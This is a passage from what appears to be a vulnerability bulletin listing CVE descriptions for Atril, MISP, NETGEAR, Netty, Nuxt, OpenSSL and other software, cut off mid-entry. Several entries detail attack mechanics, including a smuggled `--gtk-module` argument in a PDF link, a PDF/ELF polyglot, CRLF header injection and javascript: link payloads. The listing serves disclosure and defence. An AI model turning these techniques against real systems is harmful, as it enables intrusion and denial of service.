| mate-desktop--atril | Atril Document Viewer is the default document reader of the MATE desktop environment for Linux. A single-click remote code execution vulnerability in versions prior to 1.26.3 and 1.28.4 allows an attacker to achieve arbitrary code execution as the user by tricking them into clicking a link inside a malicious PDF document. The PDF can be packaged as a polyglot file that is simultaneously a valid PDF and a valid ELF shared library, making the attack a single-file, single-click, configuration-independent RCE on stock atril installations. The root cause is `shell/ev-application.c:ev_spawn`, which builds a command line from attacker-controlled PDF link-destination fields without applying `g_shell_quote`. The cmdline is then handed to `g_app_info_create_from_commandline`, which shell-parses it back into argv - splitting any embedded `--gtk-module=PATH` into a separate argv element. GTK then `dlopen()`s the path during init, running any `__attribute__((constructor))` it finds. Versions 1.26.3 and 1.28.4 contain a patch for the issue. This is the same defect class as CVE-2023-51698 (CBT `--checkpoint-action` injection in `comics-document.c`, fixed in 1.6.2) but in a different code path (`shell/ev-application.c`) that the original patch did not touch. | 2026-06-10 | not yet calculated | CVE-2026-46529 |
| membraneframework--membrane_mp4_plugin | Allocation of Resources Without Limits or Throttling vulnerability in membraneframework membrane_mp4_plugin allows unauthenticated denial-of-service via BEAM atom table exhaustion. The MP4 box header parser converts each 4-byte box name to an atom using String.to_atom/1 without validation. 'Elixir.Membrane.MP4.Container.Header':parse_box_name/1 in lib/membrane_mp4/container/header.ex interns every box name encountered while 'Elixir.Membrane.MP4.Container.Header':parse/1 walks the input. BEAM atoms are never garbage-collected, so each unique attacker-controlled 4-byte name is a permanent allocation. A crafted MP4 of approximately 8 MB containing roughly 1.1 million boxes with distinct non-standard names exhausts the atom table (default ceiling around 1,048,576 atoms), aborting the entire BEAM node and taking down all applications running on it. This issue affects membrane_mp4_plugin from 0.3.0 before 0.36.7. | 2026-06-11 | not yet calculated | CVE-2026-53423 |
| misp--bsimvis | A stored cross-site scripting vulnerability existed in MISP BSimVis tag rendering code. Several client-side rendering paths interpolated tag names, collection names, entity identifiers, cluster names, and tag metadata directly into HTML, HTML attributes, inline JavaScript event handlers, and CSS style values without context-appropriate escaping. The patch adds shared escaping helpers for HTML, attributes, JavaScript strings, and CSS color validation, then applies them across tag badges, tooltips, context menus, cluster cards, autocomplete suggestions, and dynamically inserted tag cards. An attacker able to create or influence stored tag or metadata values could inject a crafted payload that is later rendered in another user's browser. Successful exploitation could execute arbitrary JavaScript in the victim's session when they view affected BSimVis pages, potentially allowing the attacker to perform actions as the victim, read data available to the victim, or alter displayed application content. This issue affects MISP bsimvis: through v0.2.0. | 2026-06-10 | not yet calculated | CVE-2026-53693 |
| misp--misp | An improper authorization vulnerability in MISP allowed an authenticated organization administrator to access or modify user settings belonging to site administrator accounts within the same organization. The affected access-control checks scoped administrative actions by organization membership but did not exclude higher-privileged site administrator users. As a result, an organization administrator could potentially view or alter site administrator user settings and related login profile information, crossing the intended privilege boundary between organization administration and site-wide administration. The patch hardens the ACL logic by excluding site administrator accounts from organization administrator-managed user sets, adding explicit authorization failure when a target user is not administrable, and ensuring user setting and login profile operations fail closed. | 2026-06-12 | not yet calculated | CVE-2026-54357 |
| misp--misp | An incorrect authorization vulnerability in MISP allows an organization administrator to target site administrator accounts belonging to the same organization through the administrative email functionality. The affected code restricted organization administrators to users within their own organization, but did not exclude accounts assigned a site administrator role from recipient queries. As a result, an organization administrator could perform privileged account-management actions, such as initiating a password reset workflow, against a higher-privileged site administrator account in the same organization. Successful exploitation may allow an authenticated organization administrator to interfere with or potentially take over a site administrator account, resulting in privilege escalation and full compromise of the MISP instance's confidentiality, integrity, and availability. Attack prerequisites: The attacker must be authenticated as an organization administrator in the same organization as a site administrator account. | 2026-06-12 | not yet calculated | CVE-2026-54358 |
| misp--misp | MISP contains an insecure default configuration in which the Security.check_sec_fetch_site_header control is disabled. When this setting is disabled, state-changing requests such as POST, PUT, or AJAX requests are not restricted based on the browser-provided Sec-Fetch-Site header. A remote unauthenticated attacker could craft a malicious web page that causes an authenticated MISP user's browser to issue cross-site requests to MISP automation endpoints. If successful, the forged requests may be processed with the privileges of the victim user, potentially allowing unauthorized modification of MISP data or configuration. Enabling Security.check_sec_fetch_site_header mitigates this issue, although operators of multi-homed MISP deployments should validate the setting before enforcing it. | 2026-06-12 | not yet calculated | CVE-2026-54359 |
| misp--misp | A mass assignment vulnerability exists in MISP's sharing group creation endpoint. When creating a new sharing group, the controller did not remove a user-supplied id field before saving the submitted data. In CakePHP, supplying a primary key in the save data can cause a create() followed by save() operation to update an existing record instead of creating a new one. An authenticated user with permission to add sharing groups could therefore submit the identifier of an existing sharing group and modify that sharing group without passing the normal edit access-control checks. This may allow the attacker to take over or alter sharing groups they do not otherwise have access to, potentially affecting the confidentiality and integrity of information shared through those groups. Affected component: app/Controller/SharingGroupsController.php, add() action | 2026-06-12 | not yet calculated | CVE-2026-54360 |
| misp--misp | MISP contained multiple mass assignment vulnerabilities in the handling of collections, tag collections, event delegations, and shadow attributes. Several controller actions accepted user-supplied fields that should have remained server-controlled, including record identifiers and ownership-related fields such as id, org_id, orgc_id, and user_id. An authenticated attacker with access to the affected endpoints could craft requests containing protected fields in order to alter object ownership, redirect an update to another record, overwrite existing event delegation requests, or modify shadow attribute proposals belonging to another organization. This could result in unauthorized modification of MISP objects and, depending on object visibility and sharing configuration, unauthorized access to or transfer of sensitive threat intelligence data. The issue was fixed by explicitly pinning ownership and identity fields to their stored values during edit operations and by removing user-supplied primary keys from create-only save paths. Affected components: * CollectionsController::edit() * EventDelegationsController::delegateEvent() * ShadowAttributesController::edit() * TagCollectionsController::edit()915 * TagCollectionsController::editWithTags() Attack requirements: The attacker must be authenticated and able to reach the affected MISP endpoints. No user interaction is required. | 2026-06-12 | not yet calculated | CVE-2026-54361 |
| misp--misp | An incorrect visibility condition in the MISP event template builder allowed authenticated non-site-admin users to view galaxies that should not have been visible to their organisation. The custom access-control condition intended to restrict galaxies to those owned by the user's organisation or distributed beyond it used a PHP comparison expression instead of a query condition. As a result, enabled galaxies, including organisation-only custom galaxies belonging to other organisations, could be exposed in the template builder galaxy list. This could disclose metadata about private galaxy definitions to unauthorised users. | 2026-06-12 | not yet calculated | CVE-2026-54362 |
| misp--misp | A stored cross-site scripting vulnerability exists in MISP when the Overmind theme is used. The setHomePage endpoint previously saved the user-controlled path value through setSettingInternal(), bypassing the normal setSetting() validation logic, including validate_homepage, which requires homepage paths to start with /. As a result, an authenticated user could store an arbitrary homepage value, including an XSS payload. The stored value was later rendered in app/View/News/index.ctp as the href attribute of the "Continue to homepage" link without HTML escaping. This could allow execution of attacker-controlled JavaScript in the browser context of the affected MISP instance when the crafted homepage link is rendered and interacted with. The issue is fixed by always persisting the homepage setting through setSetting(), ensuring validation and access checks are applied, and by HTML-escaping the homepage value before rendering it in the news view. | 2026-06-12 | not yet calculated | CVE-2026-54393 |
| misp--misp | MISP contains a path traversal vulnerability in OrganisationsController::getOrgLogo. The vulnerable code builds organisation logo file paths using organisation-controlled fields such as id, name, and uuid without ensuring that the resolved file remains inside the intended APP/files/img/orgs/ directory. An attacker able to influence an organisation field, for example the organisation name, could use path traversal sequences to cause MISP to return arbitrary readable .png or .svg files from outside the organisation logo directory. The issue is fixed by resolving candidate paths with realpath() and verifying that they remain under the expected base directory before serving the file. | 2026-06-12 | not yet calculated | CVE-2026-54394 |
| misp--misp | MISP contains a reflected cross-site scripting vulnerability in the UiBeta event index view. The urlparams value is inserted into an inline JavaScript handler using HTML escaping inside a single-quoted JavaScript string. Because browsers HTML-decode attribute values before JavaScript parsing, a crafted searcheventinfo value can restore encoded quote characters and break out of the JavaScript string. An attacker could craft a malicious URL that, when opened by a victim using the UiBeta event index, executes arbitrary JavaScript in the victim's browser in the context of the MISP instance. The issue is fixed by encoding the value as a JavaScript string literal with json_encode() before applying HTML escaping at the attribute layer. | 2026-06-12 | not yet calculated | CVE-2026-54395 |
| misp--misp | An information disclosure vulnerability exists in the MISP AuthKey edit functionality. When a validation error occurs during an AuthKey edit request, the user dropdown was populated using the attacker-controlled AuthKey.user_id value from the submitted request data. An authenticated user with permission to edit an AuthKey could submit arbitrary user IDs and observe the returned dropdown data, allowing enumeration of user email addresses. The issue is fixed by deriving the dropdown user from the persisted AuthKey owner instead of the request body. | 2026-06-12 | not yet calculated | CVE-2026-54396 |
| misp--misp | A vulnerability in MISP's non-REST event editing path allowed an authenticated user with event edit permissions to manipulate the submitted form data and set an event's sharing_group_id to a sharing group they were not authorized to use. When distribution was set to sharing group distribution, the non-REST save path accepted the submitted sharing_group_id without performing the same sharing group authorization check enforced by the REST edit path. An attacker could exploit this by tampering with the event edit request and assigning an event to an undisclosed or unauthorized sharing group. This could result in unauthorized use of restricted sharing groups, disclosure of the sharing group name in event listings, and unintended modification of the event's distribution metadata. The issue is fixed by validating that the selected sharing group can be used by the current user when the sharing group is changed, and by clearing sharing_group_id when the event distribution is not set to sharing group distribution. | 2026-06-12 | not yet calculated | CVE-2026-54397 |
| misp--misp | An authorization flaw in MISP's object add/edit handling allowed an authenticated user with object editing permissions to assign a MISP object, or attributes contained within an object, to a sharing group that the user was not authorized to use or view. When editing objects, the sharing group validation was performed against the wrong request data structure after object fields had been merged to the top level, causing the check to be bypassed. In addition, attributes embedded in objects were not individually validated for authorized sharing group use. An attacker could craft a request with distribution set to 4 and an arbitrary sharing_group_id, potentially disclosing the existence or name of otherwise non-visible sharing groups and improperly modifying the distribution metadata of objects or contained attributes. | 2026-06-12 | not yet calculated | CVE-2026-54398 |
| Mobatek--MobaXterm Personal Edition (Portable) | MobaXterm Personal Edition (Portable), in its 26.3 version (Build 5154), allows arbitrary code execution by loading malicious DLLs from a temporary directory that is predictable and can be modified by the user. During startup, the application searches for specific DLLs in this location before resorting to the system's secure paths, enabling an attacker with local access to place a specially crafted DLL to be executed automatically when the victim launches the application. | 2026-06-12 | not yet calculated | CVE-2026-11879 |
| Mobatek--MobaXterm Personal Edition (Portable) | MobaXterm Personal Edition (Portable), in its 26.3 version (Build 5154), allows arbitrary code execution by loading a malicious DLL located in the same directory as the portable executable. Because the application automatically loads the winspool.drv library from that location during startup, an attacker with local access can place a specially crafted DLL alongside the executable to be executed when the victim launches the application. | 2026-06-12 | not yet calculated | CVE-2026-11967 |
| Moxa--UC-1200A Series | A Missing Required Cryptographic Step vulnerability has been identified in Moxa's embedded Linux firmware for industrial computers and controllers. This vulnerability represents an incomplete remediation of CVE-2026-0714. The firmware introduced TPM2 parameter encryption as a countermeasure against CVE-2026-0714. However, an omission in the authorization session configuration causes the parameter encryption to provide no effective protection. An attacker with invasive physical access to the device can still capture TPM communications on the SPI bus and derive the LUKS disk encryption key in plaintext. While successful exploitation results in full compromise of the encrypted disk volume, the attack requires invasive physical access, including opening the device and attaching external equipment to the SPI bus. Remote exploitation is not possible, and the attack does not affect any downstream systems. | 2026-06-12 | not yet calculated | CVE-2026-9266 |
| Mozilla--Focus for iOS | UXSS in Focus for iOS / Klar Webkit navigation. This vulnerability was fixed in Focus for iOS 151.3.1 and Klar for iOS 151.3.1. | 2026-06-09 | not yet calculated | CVE-2026-11799 |
| mvt-project--mvt | MVT (Mobile Verification Toolkit) helps with conducting forensics of mobile devices in order to find signs of a potential compromise. Prior to version 2026.5.12, there is a path traversal vulnerability via unsanitized File identifiers in iOS Backup processing. This issue has been patched in version 2026.5.12. | 2026-06-08 | not yet calculated | CVE-2026-46486 |
| Nemon--Nemon Trade Energy | SQL injection in the 'two_steps_auth_code' parameter processed by the 'twoStepsAuthVerification' function within the '/user-login' endpoint. The two-factor authentication (2FA) functionality can be accessed without prior authentication, allowing unauthenticated attackers to execute arbitrary SQL queries on the backend database. A successful exploit could lead to database enumeration, the unauthorised creation of privileged users, the modification or deletion of critical information, and denial-of-service conditions. | 2026-06-09 | not yet calculated | CVE-2026-10731 |
| NETGEAR--CAX30 | An unauthenticated user on the local network can gain control of the router and make unauthorized changes to its operation. | 2026-06-09 | not yet calculated | CVE-2026-9211 |
| NETGEAR--CBR750 | Insufficient configuration management in the listed devices allows authenticated administrators connected to the local network to tamper with the system. | 2026-06-09 | not yet calculated | CVE-2026-0418 |
| NETGEAR--EX3700 | Insufficient input validation vulnerability in the listed NETGEAR models allows authenticated administrators connected to the local network to make unauthorized modification of router software and functionality. | 2026-06-09 | not yet calculated | CVE-2026-9210 |
| NETGEAR--JR6150 | Insufficient input validation vulnerability in NETGEAR JR6150 (AC750 WiFi Router 802.11ac Dual Band Gigabit released in 2014) allows administrators connected to the local network to make unauthorized modification of router software and functionality. NETGEAR JR6150 reached End-of-Support status in 2018 and is no longer receiving security updates. NETGEAR strongly recommends replacing these devices with newer NETGEAR models to ensure continued security support and updates. This vulnerability has been identified through firmware emulation in a controlled research environment and has not been verified on production hardware. | 2026-06-09 | not yet calculated | CVE-2026-0412 |
| NETGEAR--JR6150 | Insufficient input validation in NETGEAR JR6150 (AC750 WiFi Router 802.11ac Dual Band Gigabit released in 2014) allows users connected to the local WiFi Networks to execute operating system commands. NETGEAR JR6150 has reached End-of-Support phase as of 2018 , and no further security updates are planned. NETGEAR strongly recommends replacing these devices with newer NETGEAR models to ensure continued security support and updates. This vulnerability has been identified through firmware emulation in a controlled research environment and has not been verified on production hardware. | 2026-06-09 | not yet calculated | CVE-2026-0419 |
| NETGEAR--LBR1020 | Insufficient authentication and input validation in the listed NETGEAR models allow users connected to the local network to execute commands impacting the product's confidentiality or change certain configurations. | 2026-06-09 | not yet calculated | CVE-2026-9212 |
| NETGEAR--MR60 | Insufficient input validation vulnerability in the listed NETGEAR devices allows authenticated administrators connected to the local network to tamper with the router's integrity. | 2026-06-09 | not yet calculated | CVE-2026-0417 |
| NETGEAR--MR70 | A vulnerability in the affected NETGEAR gaming routers allows attackers with the ability to intercept and tamper with traffic between the router and the Internet, to execute code on the device. | 2026-06-09 | not yet calculated | CVE-2026-9213 |
| NETGEAR--Orbi 370 | A NETGEAR security issue that could allow an attacker with ability to intercept and tamper with traffic between the router and the Internet to run commands on your device when the device administrator performs certain specific management actions. This issue affects NETGEAR Orbi 370 series devices before V12.1.2.7. | 2026-06-09 | not yet calculated | CVE-2026-0409 |
| NETGEAR--R7000 | Authenticated administrators connected to the local network can gain elevated access to the router and make unauthorized changes to router software and functionality. | 2026-06-09 | not yet calculated | CVE-2026-0410 |
| NETGEAR--RAX120v1 | An improper implementation of TLS certificate validation vulnerability found in NETGEAR's ReadyCloud client app which could allow an attacker to perform attacker-in-the-middle (MiTM) style attacks impacting the product's confidentiality. This vulnerability affects the listed NETGEAR models. | 2026-06-09 | not yet calculated | CVE-2026-0420 |
| NETGEAR--RAXE450 | An insufficient input validation vulnerability in certain NETGEAR router models as listed allows an authenticated administrator with local network access to submit crafted input that bypasses intended management interface restrictions, resulting in unauthorized modification of protected router software or functionality. | 2026-06-09 | not yet calculated | CVE-2026-0416 |
| NETGEAR--RBE370 | A buffer overflow vulnerability due to insufficient input validation in the listed NETGEAR models allows authenticated administrators connected to the local network to make unauthorized modification of router software and functionality. | 2026-06-09 | not yet calculated | CVE-2026-0413 |
| NETGEAR--RBE970 | An information disclosure vulnerability in the NETGEAR Orbi satellites (RBR/RBE/RBS Series) could allow a user connected to your network to gain administrator access to the Orbi router. The listed NETGEAR models are affected by this vulnerability. Orbi WiFi Systems without satellite devices are not impacted by this issue. | 2026-06-09 | not yet calculated | CVE-2026-0411 |
| NETGEAR--RBE970 | Insufficient input validation vulnerability in the listed NETGEAR models allows authenticated administrators connected to the local network to make unauthorized modification of router software and functionality. | 2026-06-09 | not yet calculated | CVE-2026-0414 |
| NETGEAR--RBE970 | Insufficient input validation vulnerability in the listed NETGEAR models allows authenticated administrators connected to the local network to make unauthorized modification of router software and functionality. | 2026-06-09 | not yet calculated | CVE-2026-0415 |
| NETGEAR--RBR860 | Unauthenticated users on the local network can cause the router to become unavailable by sending specially crafted requests. | 2026-06-09 | not yet calculated | CVE-2026-3088 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, the RedisArrayAggregator handler permanently leaks pooled direct-memory buffers when a Redis pipeline connection closes before a RESP array aggregate completes. The handler retains child messages in per-handler state (`depths` field) but defines no `channelInactive`, `handlerRemoved`, or `exceptionCaught` method to release them when the pipeline tears down. Because the leaked buffers are slices of `PooledByteBufAllocator` chunks, they prevent those chunks from being returned to the JVM-wide direct-memory pool. Repeated connection churn by any network peer monotonically drains this shared pool, eventually causing allocation failures on all Netty channels in the process. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | not yet calculated | CVE-2026-48006 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, the HAProxy PROXY protocol v2 codec in netty leaks native or heap memory on every connection when a client sends a syntactically valid header containing nested `PP2_TYPE_SSL` TLVs (type-length-value records) at depth two or greater. The leak occurs on the successful parse path - no exception is thrown, the message fires downstream, the decoder removes itself, and the application releases the `HAProxyMessage` normally. Yet the underlying cumulation buffer (a pooled, potentially direct `ByteBuf` allocated by the channel) remains permanently pinned. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | not yet calculated | CVE-2026-48059 |
| netty--netty | Netty is a network application framework for development of protocol servers and clients. Prior to versions 4.1.135.Final and 4.2.15.Final, Netty HTTP/2 max header size handling produces an attack similar to HTTP/2 Rapid Reset. There is a setting in the http2 specification called `SETTINGS_MAX_HEADER_LIST_SIZE`. When a client sends that setting to Netty, it appears that Netty will behave as follows: read the request; proxy the request to the origin; attempt to produce a response; and create an exception while writing the headers for the response. Functionally, this should be similar to the http2 reset attack, but with a different on-the-wire signature. Versions 4.1.135.Final and 4.2.15.Final patch the issue. | 2026-06-12 | not yet calculated | CVE-2026-50560 |
| Neuron Soft--Golem OEE MES | Golem OEE MES is vulnerable to an unauthenticated path traversal flaw. This vulnerability allows an attacker in the same local network to read arbitrary files from the server's operating system by manipulating HTTP request paths. This issue has been fixed in version 11.6.0 | 2026-06-11 | not yet calculated | CVE-2026-8464 |
| ninenines--cowlib | Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting') vulnerability in ninenines cowlib allows HTTP response splitting via non-VCHAR bytes in structured-fields string values. cow_http_struct_hd:escape_string/2 in cowlib only escapes \ and ", passing all other bytes through verbatim. This creates an encoder/decoder asymmetry: the matching parser accepts only printable ASCII (0x20-0x7E, excluding " and \), but the encoder emits any byte including CR and LF. An application that builds a structured HTTP header via cow_http_struct_hd:item/1 (or a higher-level wrapper such as cow_http_hd:wt_protocol/1) from attacker-controlled input can have \r\n injected into the serialized header value. Once on the wire, the injected CRLF terminates the current header and any following bytes are interpreted as a new header, enabling HTTP response splitting. This issue affects cowlib from 2.9.0. | 2026-06-08 | not yet calculated | CVE-2026-43966 |
| ninenines--gun | Origin Validation Error vulnerability in ninenines gun (gun_http2 module) allows cross-origin cookie injection via unvalidated HTTP/2 PUSH_PROMISE authority. In gun_http2:push_promise_frame/7, the :authority pseudo-header from an incoming PUSH_PROMISE frame is stored verbatim into the promised stream record without checking that it matches the connection's origin. When gun_http2:headers_frame/9 later processes the response headers for the promised stream, it calls gun_cookies:set_cookie_header/7 with the unvalidated server-supplied authority before any status branching and before user code can act. This violates RFC 7540 §10.6 / RFC 9113 §8.4, which require receivers to treat as a protocol error any push for a resource the server is not authoritative for. A malicious or compromised HTTP/2 server can plant cookies scoped to arbitrary third-party domains into the client's shared cookie store. This enables session fixation attacks against those domains and, if the planted cookie overrides a legitimate session token, may result in account takeover. No user interaction beyond making a normal HTTP/2 request to the attacker-controlled server is required. This issue affects gun: from 2.0.0 before 2.4.0. | 2026-06-08 | not yet calculated | CVE-2026-43972 |
| ninenines--gun | Uncontrolled Resource Consumption vulnerability in ninenines gun (gun_http module) allows a malicious server to exhaust client memory via unbounded HTTP/1.1 response buffering. In gun_http:handle/5, three clauses accumulate incoming TCP data into the connection's buffer field using binary concatenation with no upper-bound check: the head clause appends data until the \r\n\r\n header terminator is found; the body_chunked clause appends data whenever cow_http_te:stream_chunked/2 returns a more result indicating an incomplete chunk boundary; and the body_trailer clause appends data until the trailing \r\n\r\n is found. In each case, when the expected terminator never arrives, the enlarged binary is stored back into state and the process waits for more data, with no configurable or hard-coded ceiling on buffer size. A malicious or compromised server can exploit this by sending a partial response that never completes. For example, a response may begin with HTTP/1.1 200 OK\r\nX-Pad: followed by an unbounded stream of arbitrary bytes, never sending the header terminator. The gun connection process will continuously append the incoming data to its buffer, causing unbounded heap growth. Because BEAM imposes no per-process heap limit by default, a single malicious connection can exhaust all available memory on the node, causing a node-wide out-of-memory crash. This issue affects gun: from 1.0.0 before 2.4.0. | 2026-06-08 | not yet calculated | CVE-2026-43973 |
| ninenines--gun | Unexpected Status Code or Return Value vulnerability in ninenines gun (gun_http module) allows a malicious HTTP server to force the client into raw protocol mode via an unsolicited 101 Switching Protocols response. In gun_http:handle_inform/8, when a 101 Switching Protocols response is received over HTTP/1.1, the function verifies only that the Upgrade header is syntactically valid and that the stream reference is a plain reference(). It does not check whether the client ever sent an Upgrade or Connection: upgrade header on the corresponding request. Because this check is absent, any 101 response (solicited or not) causes gun to dispatch a gun_upgrade message to the caller and transition the entire connection to raw protocol mode. A malicious or compromised HTTP server can send an unsolicited 101 response to any HTTP/1.1 request, causing the gun client to abandon HTTP framing for that connection. Once in raw mode, gun_raw applies no flow control (flow=infinity) and re-arms socket active mode after every received packet, so the server can flood the client with arbitrary bytes. These are forwarded as unbounded gun_data messages to the owner process, exhausting its mailbox and BEAM memory, ultimately crashing the VM. This issue affects gun: from 2.0.0 before 2.4.0. | 2026-06-08 | not yet calculated | CVE-2026-43974 |
| NLnet Labs--ldns | NLnet Labs ldns 1.2.0 up to and including versions 1.9.0, when used in applications as (stub) resolver over UDP, lacks matching the query destination address and port with the response source address and port. Furthermore not the query ID, neither the question of the query is matched with that of the response. This makes applications, that use ldns for (stub) resolver functionality over UDP, vulnerable for off-path poisoning attacks. The drill tool, which is shipped with ldns, suffers from this vulnerability. | 2026-06-10 | not yet calculated | CVE-2026-10846 |
| NLnet Labs--Routinator | Routinator exits on any error when accepting incoming HTTP or RTR connections, including ones it can recover from such as running out of file descriptors. This condition can be triggered maliciously by an attacker by opening a large number of connections to the HTTP or RTR server. This only affects users that make their HTTP or RTR server available to untrusted networks. | 2026-06-08 | not yet calculated | CVE-2026-49232 |
| NLnet Labs--Routinator | Routinator does not properly check the module component of rsync URIs, which are used to create the file system paths for the Routinator cache. This allows for path traversal by having a module name containing .., potentially providing an attacker access to the entire Routinator rsync cache. | 2026-06-08 | not yet calculated | CVE-2026-49233 |
| NLnet Labs--Routinator | When sending a specifically crafted non-UTF-8 string as select-asn query parameter to the /api/v1/origins endpoint, Routinator crashes. This only affects users who allow API access from untrusted networks. | 2026-06-08 | not yet calculated | CVE-2026-49234 |
| NLnet Labs--Routinator | When Routinator encounters a file via RRDP using a specifically crafted Document Type Definition, Routinator crashes. | 2026-06-08 | not yet calculated | CVE-2026-49235 |
| NoMachine--NoMachine | Improper Neutralization of Argument Delimiters in a Command ('Argument Injection') vulnerability in Nomachine allows Argument Injection.This issue affects Nomachine: before 9.5.7, before 8.23.2. | 2026-06-10 | not yet calculated | CVE-2026-53694 |
| nuxt--nuxt | Nuxt is an open-source web development framework for Vue.js. From versions 3.4.3 to before 3.21.6 and 4.0.0-alpha.1 to before 4.4.6, navigateTo() with external: true generates a server-side HTML redirect body containing a <meta http-equiv="refresh"> tag. The destination URL is only sanitized by replacing " with %22, leaving <, >, &, and ' unencoded. An attacker who can influence the URL passed to navigateTo(url, { external: true }) can break out of the content="¦" attribute and inject arbitrary HTML/JavaScript that executes under the application's origin. This issue has been patched in versions 3.21.6 and 4.4.6. | 2026-06-12 | not yet calculated | CVE-2026-45669 |
| nuxt--nuxt | Nuxt is an open-source web development framework for Vue.js. In @nuxt/rspack-builder and @nuxt/webpack-builder versions 3.15.4 to before 3.21.6, and 4.0.0-alpha.1 to before 4.4.6, there is an incomplete fix for GHSA-4gf7-ff8x-hq99. Source code may be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. nuxt dev --host) and the developer opens a malicious site on the same network. This issue has been patched in versions 3.21.6 and 4.4.6. | 2026-06-12 | not yet calculated | CVE-2026-45670 |
| nuxt--nuxt | Nuxt is an open-source web development framework for Vue.js. In Nuxt versions 3.1.0 to before 3.21.6 and 4.0.0-alpha.1 to before 4.4.6 and @nuxt/nitro-server versions 3.20.0 to before 3.21.6 and 4.0.0-alpha.1 to before 4.4.6, the /__nuxt_island/* endpoint accepts attacker-controlled props query/body parameters and renders any island component without verifying that the URL-resident hash (<Name>_<hashId>.json) was actually issued for those inputs by <NuxtIsland>. The hash is computed and embedded client-side but never validated server-side, so the same path can return materially different responses depending on the query. This issue has been patched in versions 3.21.6 and 4.4.6. | 2026-06-12 | not yet calculated | CVE-2026-46342 |
| nuxt--nuxt | Nuxt is an open-source web development framework for Vue.js. In Nuxt versions 3.11.0 to before 3.21.6 and 4.0.0-alpha.1 to before 4.4.6 and @nuxt/nitro-server versions 3.20.0 to before 3.21.6 and 4.0.0-alpha.1 to before 4.4.6, when experimental.componentIslands is enabled (default in Nuxt 4), any .server.vue file under pages/ is automatically registered as a server island under the key page_<routeName> and exposed via the /__nuxt_island/:name endpoint. Until this fix, requests through that endpoint rendered the page component directly via the SSR renderer without instantiating Vue Router, which meant route middleware declared on the page (including definePageMeta({ middleware })) did not run. This issue has been patched in versions 3.21.6 and 4.4.6. | 2026-06-12 | not yet calculated | CVE-2026-47200 |
| nuxt--nuxt | Nuxt is an open-source web development framework for Vue.js. In @nuxt/rspack-builder and @nuxt/webpack-builder from versions 3.15.4 to before 3.21.7 and 4.0.0 to before 4.4.7, there is an incomplete fix for GHSA-6m52-m754-pw2g. Source code may still be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. nuxt dev --host) and the developer opens a malicious site on the same network. This issue has been patched in versions 3.21.7 and 4.4.7. | 2026-06-12 | not yet calculated | CVE-2026-49993 |
| nuxt--nuxt | Nuxt is an open-source web development framework for Vue.js. From versions 3.11.0 to before 3.21.7 and 4.0.0 to before 4.4.7, there is a route-rule middleware bypass via case-sensitivity mismatch between vue-router and the routeRules matcher. This issue has been patched in versions 3.21.7 and 4.4.7. | 2026-06-12 | not yet calculated | CVE-2026-53721 |
| nuxt--nuxt | Nuxt is an open-source web development framework for Vue.js. Prior to versions 3.21.7 and 4.4.7, <NuxtLink> did not validate the URL scheme of values bound to its to or href props before rendering them into the href attribute of the underlying <a> element. When an application binds attacker-controlled input (a query parameter, a CMS field, a user-supplied profile URL) to <NuxtLink :to> or :href, the attacker can supply a javascript: or vbscript: URL that is reflected verbatim into the rendered markup. Clicking the link executes the supplied script in the origin of the Nuxt application, resulting in reflected DOM-based cross-site scripting. A data:text/html,... payload reflected through the same sink does not execute in the application's origin but enables a same-tab phishing surface anchored to a legitimate application link. The same value was exposed to consumers of the component's custom slot via the href and route.href props, so applications that re-bind those values to their own anchors were affected identically. This issue has been patched in versions 3.21.7 and 4.4.7. | 2026-06-12 | not yet calculated | CVE-2026-53722 |
| OpenSSL--OpenSSL | Issue summary: Parsing a crafted DER-encoded ASN.1 structure with a primitive element whose content exceeds 2 gigabytes in length may cause a heap buffer over-read on 64-bit Unix and Unix-like platforms. Impact summary: The heap buffer over-read may crash the application (Denial of Service) or to load into the decoded ASN.1 object contents of memory beyond the end of the input buffer. More typically such ASN.1 elements would instead be truncated. An integer truncation in OpenSSL's ASN.1 decoder causes the content length of an ASN.1 primitive element to be mishandled when it exceeds 2 gigabytes. In the worst case the truncated length is treated as a request to scan the binary content for a terminating zero byte, possibly causing OpenSSL to read either less than or beyond the end of the allocated buffer. Applications that pass attacker-supplied data to d2i_X509(), d2i_PKCS7(), or any other d2i_* decoding function are affected. OpenSSL's own command-line tools are not vulnerable, as data read through the BIO layer is checked before it reaches the affected code. The issue only affects 64-bit Unix and Unix-like platforms; 32-bit platforms and 64-bit Windows are not affected. The FIPS modules in 4.0, 3.6, 3.5, 3.4 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-34180 |
| OpenSSL--OpenSSL | Issue Summary: The PKCS#12 file processing fails to perform sufficient input validation for files that use Password-Based Message Authentication Code 1 (PBMAC1) integrity mechanism allowing a certificate and private key forgery. Impact Summary: An attacker impersonating a user can cause a service reading PKCS#12 files to accept forged certificates and private keys with a 1 in 256 probability. If a service accepting PKCS#12 files is using passwords for authenticating the received files, the attacker can create unencrypted PKCS#12 files that use PBMAC1 authentication that specifies an HMAC key of only one byte, allowing them to craft a file that will be accepted with a 1 in 256 probability. That would then cause the service to accept a certificate and private key controlled by the attacker. The FIPS modules are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary. | 2026-06-09 | not yet calculated | CVE-2026-34181 |
| OpenSSL--OpenSSL | Issue Summary: Cryptographic Message Services (CMS) processing fails to perform sufficient input validation on the cipher and tag length fields of AuthEnvelopedData containers, leading to various potential compromises. Impact Summary: Attackers making use of these vulnerabilities may achieve key-equivalent functionality for a given CMS recipient and/or bypass integrity validation for a given message. In one use case, an attacker may send a CMS message containing AuthEnvelopedData with the cipher specified as a non-AEAD cipher. OpenSSL erroneously allows this selection, and attempts to decrypt and validate the message. An on-path attacker who captures one legitimate AES-GCM AuthEnvelopedData addressed to the victim can re-emit it with the recipientInfos set left byte-for-byte intact, so the victim's private key still unwraps the genuine CEK (the content-encryption key), but with the inner OID rewritten to AES-256-OFB (Output Feedback Mode, an unauthenticated keystream mode) and with an attacker-chosen IV and ciphertext. The victim initializes AES-256-OFB under the real CEK, never consults the MAC field, and CMS_decrypt() returns success. If the application under attack responds to the attacker with any indicator showing success or failure of the decryption effort, it is possible for the attacker to 